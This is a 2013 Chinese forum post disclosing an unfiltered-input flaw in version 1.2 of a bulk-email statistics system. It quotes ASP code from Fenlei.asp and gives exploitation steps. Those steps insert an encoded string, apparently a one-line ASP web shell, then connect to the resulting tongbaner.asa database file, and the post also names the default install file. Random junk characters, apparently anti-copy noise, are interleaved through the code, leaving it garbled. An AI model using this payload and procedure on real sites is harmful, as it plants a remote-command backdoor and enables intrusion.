找回密码
 立即注册
查看: 2555|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
'Fenlei.asp
% A2 i1 h( ^/ f8 f$ G( p) b
  V- b, E& |: |IF Request.QueryString("Action")="del" Then
% m# t7 ]8 G" i: V' m0 qID=Request.QueryString("ID") ! D& F! o# x- `9 g. m8 O/ h
IF Countss ("tui","Fenlei",ID )<>0 then
9 d6 o% X9 U3 D0 J0 _/ x'略 ' {7 t3 d' @7 c# [3 s( t$ y) v$ K  n
IF Request.QueryString("Action")="Add" Then # m6 t" i  ]1 ^# B1 E+ t7 `
Tname=Request.Form("Typename") 9 f1 S8 c5 y2 z: M
Set Rs=Server.CreateObject("adodb.Recordset") ( K6 ^) e( X; ?% G1 r
Sql="Select * From Fenlei Order by id Desc " , F! n) X# Y+ b$ O2 e2 ?, R2 j
Rs.Open Sql,Conn,1,3
& r* X* T+ v3 H& MRs.Addnew
% T) E; r  a: n3 h% TRs("Typename")=Tname 9 J# ?" p$ y3 `* B9 z& G- u
'略 * h  `' |6 }: O- I
Set Rs=Server.CreateObject("adodb.Recordset") 4 P0 ?& J( J( ]$ D5 ]4 N
Sql="Select * From Fenlei Order by id Desc " 6 V. A2 _4 x2 n4 l# S4 T
Rs.Open Sql,Conn,1,1 # A  A2 _! K/ C9 L( J2 |/ |3 a
'略 , l) Z, t; i; s/ T$ Z
%>
7 M! h4 G* o9 i
) {4 X4 P$ X  y: F% D/ p6 D9 p : X7 J+ `4 i: j/ d/ @$ k2 z8 Y. p

" m. d" h# o& g! j& L没有过滤,直接写入数据库。& _9 l) S2 Y8 M$ m/ G4 h
) j5 e( w( ~" f* \# L( m$ ?
利用方法:
( B# Z/ q8 y6 s, X: O' M " `: l  G3 P0 ]1 @4 B- D( ^3 M
插入:┼攠數畣整爠煥敵瑳∨≡┩>
* t5 c& v$ }- } ) p; i  F. {1 z  O5 Y

8 w5 e5 S5 V# c- v连接: http://www.xxx.com/###tongbaner.asa
1 N. L2 c4 b/ }'默认安装文件:
7 J' ]6 H) N& s$ t: `7 N0 s'install.asp) G. v1 R# C$ m5 I, o
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表